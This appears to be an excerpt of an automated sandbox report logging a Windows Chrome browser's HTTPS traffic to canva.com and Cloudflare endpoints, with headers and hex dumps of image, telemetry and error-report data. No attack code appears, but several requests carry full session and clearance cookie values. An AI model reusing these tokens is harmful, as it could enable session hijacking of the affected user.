                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    x-request-id: 8e58c3624c948ccd
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=iucZK7Pa5SGs7eZn1QdCjC1e%2BLqUQ6O9SsZZorM5IlxIAiJ6jIBbk3IoLwa5QEiop%2FMFN9DIEFXCymAPWKHw%2B0S%2BTVmWn614iCN1u7e6fN3twmOIDFInprrm7CC%2BqWtKfg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC228INData Raw: 37 62 31 66 0d 0a 89 50 4e 47 0d 0a 1a 0a 00 00 00 0d 49 48 44 52 00 00 06 40 00 00 03 3f 08 02 00 00 00 06 22 89 43 00 00 00 01 73 52 47 42 00 ae ce 1c e9 00 00 df 4f 49 44 41 54 78 da ec d8 31 01 00 00 0c c3 a0 f9 37 dd d9 c8 01 32 b8 01 00 00 00 40 d8 0d 00 00 00 00 c2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20
                                                                                                                                                                                                                                                                    Data Ascii: 7b1fPNGIHDR@?"CsRGBOIDATx172@i4@ M`&HX,i4@ M`&HX,i4@
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69 02 0b 00 00 00 80 34 81 05 00 00 00 40 9a c0 02 00 00 00 20 4d 60 01 00 00 00 90 26 b0 00 00 00 00 48 13 58 00 00 00 00 a4 09 2c 00 00 00 00 d2 04 16 00 00 00 00 69
                                                                                                                                                                                                                                                                    Data Ascii: M`&HX,i4@ M`&HX,i4@ M`&HX,i4@ M`&HX,i4@ M`&HX,i
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: 66 ee b2 e7 bd 0a 00 80 80 05 00 ac 50 5b d6 69 58 00 00 02 16 1c 76 ed e7 a5 e9 30 80 e3 f8 5f d6 3f 60 59 41 9d 34 52 aa cb 30 83 d0 fd 52 30 ea 56 69 44 e6 d8 6f 77 eb 14 dd ba 34 65 5b 6c 07 3b 78 89 0e 41 54 53 59 da 8a 90 88 28 e7 fa ae 41 10 04 d9 98 31 f0 f5 e2 c3 c3 73 7e 8e 6f 1e 00 fa 5f 5b 76 3f 7f a9 37 9a 5b 3b 1f b7 b6 ad c7 6d be fb d0 68 7e da 6b 75 de b3 a5 61 01 00 08 58 00 40 bf 7c fb be 17 9c 0f 1e d7 8e 9d bf 71 e6 ea dd 53 93 0b d6 c3 4e 5f b9 73 3c 74 6b 34 9e aa 3c 6f b4 db 3f 1b 56 4b c3 02 00 10 b0 00 80 fe 05 ac 47 c5 67 27 27 17 2e ce a5 c7 66 92 d6 cb 66 93 63 f1 c4 f8 5c 3e be 5c 5b 59 7f 1b 3c a9 86 05 00 20 60 01 00 fd 0c 58 0f 9f ac 0d 85 6e 07 15 e6 5c 2c 61 bd 6d 24 bc 78 e1 5a 3e 92 ab 86 33 e5 d5 f5 ba 86 05 00 20 60
                                                                                                                                                                                                                                                                    Data Ascii: fP[iXv0_?`YA4R0R0ViDow4e[l;xATSY(A1s~o_[v?7[;mh~kuaX@|qSN_s<tk4<o?VKGg''.ffc\>\[Y< `Xn\,am$xZ>3 `
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: ab 73 d7 36 b0 96 73 79 e1 99 7f e8 a9 47 98 98 31 8e 7b 8d e3 3e 39 e2 15 26 7c 03 4f 3c 8d bd 8f 4e f7 59 ca 69 b9 69 15 3f 4f 68 cd ee 50 4c 7a e8 58 71 03 00 00 40 c1 28 b0 00 00 00 05 d6 bf 6e 60 45 17 d2 f5 6a 7d b3 d6 78 b2 7b 40 c6 94 9f 81 55 be a4 ec 8f ac 37 f0 c1 e1 09 ba 66 66 a7 7c ef 9d 72 c4 ed 9f 9d 74 bf 3b d0 a4 3b ac ea 3b d4 d2 2b e6 60 4b 6f dd b9 5b fb 8e b6 5b 9e 3b b7 fe 44 00 00 00 05 a3 c0 02 00 00 14 58 d5 0b ac ca c1 72 6b 79 77 30 e2 0f cf fb e6 62 32 46 fa f1 ca 2d a5 bf ad d8 7d e1 97 ce c0 ab e9 90 cd 15 b4 b9 83 36 d7 7f e5 f5 74 e8 85 fd ed 91 b3 fd 75 17 ee 6e a7 41 ad df 7f 5c fb d8 e6 a5 c0 02 80 df ec dd fd 4f 55 f7 1d c0 f1 7f 6a 0f bf 2f 5b b3 b5 d5 26 2e d1 26 6d 7d 64 73 6d 51 3a 31 d9 04 d4 a4 e9 5a 2c d7 b5 4d
                                                                                                                                                                                                                                                                    Data Ascii: s6syG1{>9&|O<NYii?OhPLzXq@(n`Ej}x{@U7ff|rt;;;+`Ko[[;DXrkyw0b2F-}6tunA\OUj/[&.&m}dsmQ:1Z,M
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: ab 55 db f6 1f 3d d7 7f 2d 35 1b 58 45 01 ab f0 ef 52 68 58 eb 5e 3a f4 9d 4d 02 16 00 90 0c 02 16 00 10 bb 80 35 71 e7 eb 0d 3f 7f 2b ec 1c 3d bf af b9 9c 13 ea d5 53 2f 37 75 f7 0d 96 78 06 d6 ba ea cc b6 fd ad 65 3e d8 c2 33 b0 76 1f 1e 1e 1b ff ff 03 d6 73 bf 28 34 ac 77 9e a9 6e fa d6 c6 7d 02 16 00 90 08 02 16 00 10 bb 80 15 7e aa e7 f2 70 ef c0 c8 f9 f2 4e df 95 d1 b3 17 87 ee de 9b fa df 33 47 4f 92 0a 37 f4 5e 19 2d f3 c1 7a 07 46 bf bc 34 3c 35 33 fb 38 02 d6 91 d0 b0 f2 5f fc e6 bb cf d6 ff fe af 9d 02 16 00 10 7f 02 16 00 10 a3 80 15 dd bc b6 c2 19 12 74 b0 15 05 ac a8 61 6d 6b 38 fa bd ed af fd f1 c3 7f 85 3f 9d 13 b0 00 80 78 13 b0 00 80 d8 6d 60 85 6b 6e ed 44 67 48 c4 c1 56 b1 81 55 b8 6e ad 6f 7d f2 c5 37 ff 74 e2 73 01 0b 00 88 3f 01 0b
                                                                                                                                                                                                                                                                    Data Ascii: U=-5XERhX^:M5q?+=S/7uxe>3vs(4wn}~pN3GO7^-zF4<538_tamk8?xm`knDgHVUno}7ts?
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: e7 e6 9b ba 7d 81 05 00 e4 4a c0 02 00 6a 12 b0 5a 7a 8b e9 da 70 64 68 8f ed 82 35 1c 1d aa bc 14 01 0b 00 c8 91 80 05 00 d4 24 60 55 72 49 aa 24 07 07 46 d3 d5 76 6a d5 57 90 5e 87 2f b0 00 80 4c 09 58 00 c0 7f 0e 58 96 c5 04 2c 00 20 23 02 16 00 20 60 d5 e3 04 2c 00 20 23 02 16 00 20 60 d5 e3 04 2c 00 20 23 02 16 00 20 60 d5 e3 04 2c 00 20 23 02 16 00 20 60 d5 e3 04 2c 00 20 23 02 16 00 90 7d c0 aa fe 7f bd 42 5f a9 d0 77 7d d3 4a 85 4d f7 6c ff 78 e5 fe 74 fd 6d 9b 6f fb e7 df b3 fd 2a 8f 08 58 00 00 02 16 00 10 33 60 a5 f4 53 b9 36 77 8f 34 76 0d 37 76 5d ab 6e 7f d7 70 73 cf c8 81 9e 62 e1 67 4b aa de bf e5 e3 4d e9 91 ad 96 1e df 58 6f b1 9a c3 d2 cd 7f f5 7b 7a aa bf e7 0f ab 3e 22 60 01 00 08 58 00 40 c0 80 95 96 ea 52 6b 7f e9 fc d8 ec f4 ed fb
                                                                                                                                                                                                                                                                    Data Ascii: }JjZzpdh5$`UrI$FvjW^/LXX, # `, # `, # `, # `, #}B_w}JMlxtmo*X3`S6w4v7v]npsbgKMXo{z>"`X@Rk
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: 36 8c 57 56 f3 3d 74 b2 a7 8b 11 b0 00 00 00 08 58 00 00 e0 c3 0f 58 03 43 63 d1 a9 57 94 ab d4 a7 82 22 e6 93 90 56 f6 ad 09 89 fb e6 64 ee 8b ae 3e 53 94 f4 5a d7 dc a6 02 a5 0e 15 bc d2 80 b5 21 34 f1 44 e6 8d 91 b1 49 cb 2d eb 5a b5 ea 95 ef b7 10 6a 38 ab f4 de a3 c3 29 97 63 33 ae 6b 34 cc eb 88 49 2f 0e ff 2e 87 09 2c 00 00 00 02 16 00 00 08 90 80 35 a2 27 99 9c 9a c9 2c ba b7 fd 60 fa ee 98 ec 5d c7 b2 bf 38 74 26 e3 f2 dd cb 15 4d 1d dd 03 fa ad e6 a5 f4 da f4 b8 7d c7 91 b3 e6 da 15 06 2c f7 55 07 93 0b bb 55 cd dc ce 15 57 ff dd 3b 60 0d 99 36 34 3c 36 a9 ac 36 30 ec 7d f4 0f 8d 0d 8f 4e e4 95 d5 13 b0 00 00 00 08 58 00 00 20 20 02 56 6f ff 88 d9 34 5d 53 51 1d dd fd 9d bd 83 9a 81 7a d9 dd 3f 35 6d d7 9b 9e d9 ab 07 8f db f5 8d 81 5a 63 68 56
                                                                                                                                                                                                                                                                    Data Ascii: 6WV=tXXCcW"Vd>SZ!4DI-Zj8)c3k4I/.,5',`]8t&M},UUW;`64<660}NX Vo4]SQz?5mZchV
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: c7 b8 2a fe e8 b7 eb f8 5c f7 c4 13 5e 71 42 7c bb d1 6c b1 7d d5 5f 6f d8 5e cf ee df eb 11 b0 00 00 04 2c 00 a0 c3 40 04 ac 76 33 1a 9d 2a 1e 98 ba d9 fa 8b df bf d5 a2 f6 43 55 71 87 d1 6c f7 c4 0d db a7 f5 b2 1e 4f 60 01 00 08 58 00 40 a7 41 09 58 46 c0 02 00 fe 6f 02 16 00 20 60 0d e2 08 58 00 40 8a 08 58 00 c0 d6 04 ac 6d 47 67 0e 0a 58 e9 19 01 0b 00 48 11 01 0b 00 d8 82 80 55 79 fa 7a 68 ec 4a 26 7b 63 df 64 c1 a4 62 32 d9 e2 d0 d8 74 b5 b6 26 60 01 00 fd 4f c0 02 00 7a 92 b4 8f ea ea 9b e1 13 b9 b1 8b 4b 87 cf df 32 a9 98 d8 ac d8 b2 47 2f de 36 63 13 7f 08 58 00 40 5f 13 b0 00 80 5e 35 1a 8d 26 a9 65 fb 00 80 fe 27 60 01 00 bd e6 8f e4 f8 b3 41 ca 24 5b a6 61 01 00 fd 4f c0 02 00 00 00 a0 af 09 58 00 00 00 00 f4 35 01 0b 00 00 80 5f ec d8 b1 00
                                                                                                                                                                                                                                                                    Data Ascii: *\^qB|l}_o^,@v3*CUqlO`X@AXFo `X@XmGgXHUyzhJ&{cdb2t&`OzK2G/6cX@_^5&e'`A$[aOX5_
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: 38 64 b3 59 34 5a b1 58 ec 4b 1e c9 64 32 97 cb 41 5a ea f7 fb 8b c5 e2 7c 3e cb c9 58 ca df 0a df ef f7 78 60 22 91 80 b5 5c 92 24 af d7 2b 8a a2 70 03 78 cc e7 f3 c1 13 07 67 5c 2a 95 82 9e 45 8b f2 dc fc c5 ae b3 ec a8 46 09 2d 09 51 60 50 a5 51 5c 2e 17 2a 8e 56 0a df 03 81 40 28 14 42 88 5e af 47 a5 96 fb 8c 9e 27 c2 62 41 b7 2a 14 0a 18 c0 60 30 e8 f7 fb 3d 1e 0f d8 18 59 88 7f ec 9c 3d 6b 22 51 14 86 ff 4a aa 34 09 44 48 15 89 bb 45 20 10 02 21 45 7e 40 ca 84 84 90 26 f8 51 d8 0b e2 17 08 5a 08 8b ff c1 d6 4a 2c 54 44 11 b4 54 b0 b3 11 04 cb 85 7d 98 b3 7b 90 bb 3a 8c ba d5 ce 79 8b 30 33 66 ce 99 b9 57 e7 9e 79 ee 39 f7 e6 46 ee 82 90 18 36 0a 3b 93 d3 1d 17 7a b5 f0 97 6c 36 cb 2d 4b 5f 1c 23 e2 67 4c 6d ba 90 bb 23 85 f9 60 fb 84 e5 b4 d5 78 3c
                                                                                                                                                                                                                                                                    Data Ascii: 8dY4ZXKd2AZ|>Xx`"\$+pxg\*EF-Q`PQ\.*V@(B^G'bA*`0=Y=k"QJ4DHE !E~@&QZJ,TDT}{:y03fWy9F6;zl6-K_#gLm#`x<
                                                                                                                                                                                                                                                                    2024-11-20 15:01:50 UTC1369INData Raw: ec 4b 8d d7 25 4a 6f 72 cd 8c 3c 64 86 18 cb 8e b5 46 c8 a6 4d ec 58 7c 68 64 b5 87 e8 95 09 0f f4 b1 63 40 4d 91 9e e2 0c 17 42 b9 d9 76 bb 75 3a ca e9 5c 2f 79 3d 32 73 ff 93 b2 9c e5 78 3c 4a 32 0a d1 48 d9 a3 42 33 ee e3 7e bf 3f ed 80 81 37 29 37 33 ec 30 4b 4b b9 62 37 7e 87 c9 90 26 37 4c 0c 11 b2 aa 0d 64 dd d8 53 fa 7a bd c2 73 0e 6e cc 85 3c a8 bb d8 98 bd da 69 31 d9 50 df af 08 54 32 ff 06 94 13 e7 22 66 6e f7 fb fd 04 c0 ca 1a 33 8a c7 ab 7e cd 93 89 12 79 de 6e b7 31 b4 17 13 f8 23 e4 d1 7c 36 b4 47 f6 5f 02 58 4f d1 98 15 71 d5 88 06 19 8e cc 16 24 51 21 a7 cf ef 6a 22 e6 60 aa af 10 96 4a 1f ab 02 58 a5 0f 51 9f 05 2d 04 1c 26 61 a9 2b 6c 87 4d 84 92 a1 54 56 4e 04 37 f1 4c fa 2c f0 46 39 60 cd 7e a8 00 56 69 9d 1a eb ab 52 cf 84 02 58 a5
                                                                                                                                                                                                                                                                    Data Ascii: K%Jor<dFMX|hdc@MBvu:\/y=2sx<J2HB3~?7)730KKb7~&7LdSzsn<i1PT2"fn3~yn1#|6G_XOq$Q!j"`JXQ-&a+lMTVN7L,F9`~ViRX


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    114192.168.2.124984335.190.80.1443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC470OUTPOST /report/v4?s=cieGLFt6H7sZRhPwYowh1Q7hyn5s1wR%2FHkRpNjolTj8PPDVJjl4ZM3SUWQexkojioKzqEqqofInGo1xBKIaAKigDKoJKfTvrHx5r2nk9rS1vU0x70fx4fs8CH1AE5V4%3D HTTP/1.1
                                                                                                                                                                                                                                                                    Host: a.nel.cloudflare.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 438
                                                                                                                                                                                                                                                                    Content-Type: application/reports+json
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC438OUTData Raw: 5b 7b 22 61 67 65 22 3a 30 2c 22 62 6f 64 79 22 3a 7b 22 65 6c 61 70 73 65 64 5f 74 69 6d 65 22 3a 32 31 31 33 2c 22 6d 65 74 68 6f 64 22 3a 22 47 45 54 22 2c 22 70 68 61 73 65 22 3a 22 61 70 70 6c 69 63 61 74 69 6f 6e 22 2c 22 70 72 6f 74 6f 63 6f 6c 22 3a 22 68 74 74 70 2f 31 2e 31 22 2c 22 72 65 66 65 72 72 65 72 22 3a 22 22 2c 22 73 61 6d 70 6c 69 6e 67 5f 66 72 61 63 74 69 6f 6e 22 3a 31 2e 30 2c 22 73 65 72 76 65 72 5f 69 70 22 3a 22 31 30 34 2e 31 36 2e 31 30 32 2e 31 31 32 22 2c 22 73 74 61 74 75 73 5f 63 6f 64 65 22 3a 34 30 35 2c 22 74 79 70 65 22 3a 22 68 74 74 70 2e 65 72 72 6f 72 22 7d 2c 22 74 79 70 65 22 3a 22 6e 65 74 77 6f 72 6b 2d 65 72 72 6f 72 22 2c 22 75 72 6c 22 3a 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 61 6e 76 61 2e 63 6f 6d 2f
                                                                                                                                                                                                                                                                    Data Ascii: [{"age":0,"body":{"elapsed_time":2113,"method":"GET","phase":"application","protocol":"http/1.1","referrer":"","sampling_fraction":1.0,"server_ip":"104.16.102.112","status_code":405,"type":"http.error"},"type":"network-error","url":"https://www.canva.com/
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC168INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                                                                                                                    date: Wed, 20 Nov 2024 15:01:51 GMT
                                                                                                                                                                                                                                                                    Via: 1.1 google
                                                                                                                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                    Connection: close


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    115192.168.2.1249844104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC1320OUTPOST /v1/traces HTTP/1.1
                                                                                                                                                                                                                                                                    Host: telemetry.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    Content-Length: 3117
                                                                                                                                                                                                                                                                    sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                                                                                                                                                                                                                                    sec-ch-ua-platform: "Windows"
                                                                                                                                                                                                                                                                    sec-ch-ua-mobile: ?0
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: same-site
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Referer: https://www.canva.com/
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; cf_clearance=f7lju1RE1zdHiOCQL4i18liElZUAlfkVsP6AsyiJ9gk-1732114905-1.2.1.1-6UtwQ4hKGzF5NKxEfI9x5H88_Or4i7.rSV90jNTTLP87mMsuweOxf9DCO7S4n8Mh2iJJF9L5oIl_T_5Dx8gg4KoK9920foRVgkHwJQGftplwcLSoQDZfMfTIca8xp0dpsUJ9zfE0iLU70u4qgItL3UQgK1OsjsDSOLVtMFAUeTxp6tNbNlj_bzERU3hJsxAjxUcowpiF2NDp_.Wng209KNIlFsiCXNpusKjI9AF.xU.W9xNnzKrh.rCkOUQoNawmY4l7lOyfL_.UyhI_tB0ABRq6aO2FugZB72yAs_jk3sc0i8YRldipRimJJbxLPGEmDaFRtMnDyG_EpzNkkYrM.q82jCjLZrLTVnVRW.z5Qb2x6aOIKUUgi.CXD3zqOT20
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC3117OUTData Raw: 7b 22 72 65 73 6f 75 72 63 65 53 70 61 6e 73 22 3a 5b 7b 22 72 65 73 6f 75 72 63 65 22 3a 7b 22 61 74 74 72 69 62 75 74 65 73 22 3a 5b 7b 22 6b 65 79 22 3a 22 61 70 70 2e 63 6f 6d 70 6f 6e 65 6e 74 22 2c 22 76 61 6c 75 65 22 3a 7b 22 73 74 72 69 6e 67 56 61 6c 75 65 22 3a 22 64 65 73 69 67 6e 5f 76 69 65 77 65 72 22 7d 7d 2c 7b 22 6b 65 79 22 3a 22 73 65 72 76 69 63 65 2e 6e 61 6d 65 22 2c 22 76 61 6c 75 65 22 3a 7b 22 73 74 72 69 6e 67 56 61 6c 75 65 22 3a 22 64 65 73 69 67 6e 5f 76 69 65 77 65 72 20 7c 20 74 65 6c 65 6d 65 74 72 79 2e 75 73 65 72 5f 6f 70 65 72 61 74 69 6f 6e 22 7d 7d 2c 7b 22 6b 65 79 22 3a 22 61 70 70 2e 73 6f 75 72 63 65 22 2c 22 76 61 6c 75 65 22 3a 7b 22 73 74 72 69 6e 67 56 61 6c 75 65 22 3a 22 77 65 62 22 7d 7d 2c 7b 22 6b 65 79
                                                                                                                                                                                                                                                                    Data Ascii: {"resourceSpans":[{"resource":{"attributes":[{"key":"app.component","value":{"stringValue":"design_viewer"}},{"key":"service.name","value":{"stringValue":"design_viewer | telemetry.user_operation"}},{"key":"app.source","value":{"stringValue":"web"}},{"key
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC857INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:51 GMT
                                                                                                                                                                                                                                                                    Content-Type: application/json
                                                                                                                                                                                                                                                                    Content-Length: 21
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e595155ace1c47f-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Access-Control-Allow-Origin: https://www.canva.com
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    access-control-allow-credentials: true
                                                                                                                                                                                                                                                                    Access-Control-Allow-Headers: Content-Type
                                                                                                                                                                                                                                                                    Access-Control-Allow-Methods: POST
                                                                                                                                                                                                                                                                    Access-Control-Max-Age: 3000
                                                                                                                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fIt5SFBA2T5oPNA7SgK8Ea62f8Wrgz1MkjKNY2wYrjn8fn74QJ5fqYiCRmg1%2FwkbPOqMZb5ZZkh15jPKy5KwJeo4nGon376GKXaUj%2FSuc2kSobbG9YYWMXbe%2BxdBthQsss4GKP4%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC21INData Raw: 7b 22 70 61 72 74 69 61 6c 53 75 63 63 65 73 73 22 3a 7b 7d 7d
                                                                                                                                                                                                                                                                    Data Ascii: {"partialSuccess":{}}


                                                                                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                    116192.168.2.1249845104.16.102.112443380C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC1248OUTGET /_ajax/ae/createBatch HTTP/1.1
                                                                                                                                                                                                                                                                    Host: www.canva.com
                                                                                                                                                                                                                                                                    Connection: keep-alive
                                                                                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                                                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                                                                                    Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                    Sec-Fetch-Mode: cors
                                                                                                                                                                                                                                                                    Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                    Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                    Accept-Language: en-US,en;q=0.9
                                                                                                                                                                                                                                                                    Cookie: CDI=f20b90ec-5e8f-4bb6-be48-451829eebec0; CPA=cnvan_Mm-faQPj7cgjjfGq6GzlGnv-LOH1K4zTMBzaJlKmdEA3HuR7WKxgoSvxqxYeFKUV9yxMdAtpdk9zNQJFa_IhnEKwi3xFMW9OnFWo36Iz1j0M0xp8OpJXxEKJB6rLpd-zt_peq3WcAiBfDzVWlPWudaJO_-uzpuX2SukFPS7281LKqMMIGp1A0Dnt3Sx9iyRr6R4OicMxut94uyp5i51bfLaKQDb_MlwoIEM3_cAdbSk4mwfDnTiE1KU6XktDXBgcKi7_rhxx2pdjt44M13RqfK_vQBo0NfALAr7OzLB4uhvQ1ro9cewoIcJVxm1fXlyEtgJt95DqEuXNkDsJkudb88vX5Y86P-b9xjxUCgaZANJrxvhqTo6x8nmmEvFgK0GCN6dYgHPV57DOyJ2aDTO6ONzB3y0S7ZCuR1wu2xET7wa6SS4h6f4NmiWzOpuAj9IBVSuodghvL8H7iUp3ENM165eJghffHtb1Bn39zAkomdUGLoP6898ePkOeIDG5idPD8KELAa768b4e0; CCK=-E0EZumFSVkMqawq7C6qsw; __cf_bm=CoFuFc2Olv.PLzNZ9D5cSol7gD_1oubWbrQgY7s67ME-1732114887-1.0.1.1-6vuhSwFFIOUU0SqJeYJdAm_Y2CSF39yrZ8nAB6vGSkozK40lsStxZqvHs4IHK_ApVPgRN_1qjPnhApIODw1ezQ; _cfuvid=SjMkvz9kovr56clXqhdACbrh2VfjgqYKPde8.5M5EhE-1732114887971-0.0.1.1-604800000; ASI=01JD51FV1VGM6BED24P74ETQK2
                                                                                                                                                                                                                                                                    2024-11-20 15:01:51 UTC1073INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                    Date: Wed, 20 Nov 2024 15:01:51 GMT
                                                                                                                                                                                                                                                                    Content-Type: text/javascript;charset=utf-8
                                                                                                                                                                                                                                                                    Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                    Connection: close
                                                                                                                                                                                                                                                                    CF-Ray: 8e5951568f376a4e-EWR
                                                                                                                                                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                                                                                                                                                    Cache-Control: no-cache, no-store
                                                                                                                                                                                                                                                                    Expires: Thu, 01 Jan 1970 00:00:00 GMT
                                                                                                                                                                                                                                                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                                                                                                                                                                                    Vary: Origin
                                                                                                                                                                                                                                                                    Pragma: No-cache
                                                                                                                                                                                                                                                                    accept-ch: Sec-CH-UA-Platform-Version
                                                                                                                                                                                                                                                                    content-security-policy: frame-ancestors https://canvateam.zendesk.com https://phoenix.canva.com https://www.canva-iris.com;
                                                                                                                                                                                                                                                                    referrer-policy: strict-origin-when-cross-origin
                                                                                                                                                                                                                                                                    x-content-type-options: nosniff
                                                                                                                                                                                                                                                                    x-frame-options: deny
                                                                                                                                                                                                                                                                    x-request-id: 8e5951568f376a4e
                                                                                                                                                                                                                                                                    x-xss-protection: 1; mode=block
                                                                                                                                                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jINbd58MQ8gujPG0Q59B8DCm%2FVoFaHY%2FxWBxE6By3tJKzUFngWmmi%2Bs3AwSIGsTRTVwUnyLykgssfLb%2BvQuaXwYUqlxqLbU0L7PCPt89A5UYEkvqMbGF6yuwOFstdqY%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    NEL: {"success_fraction":0.01,"report_to":"cf-nel","max_age":604800}
                                                                                                                                                                                                                                                                    Server: cloudflare
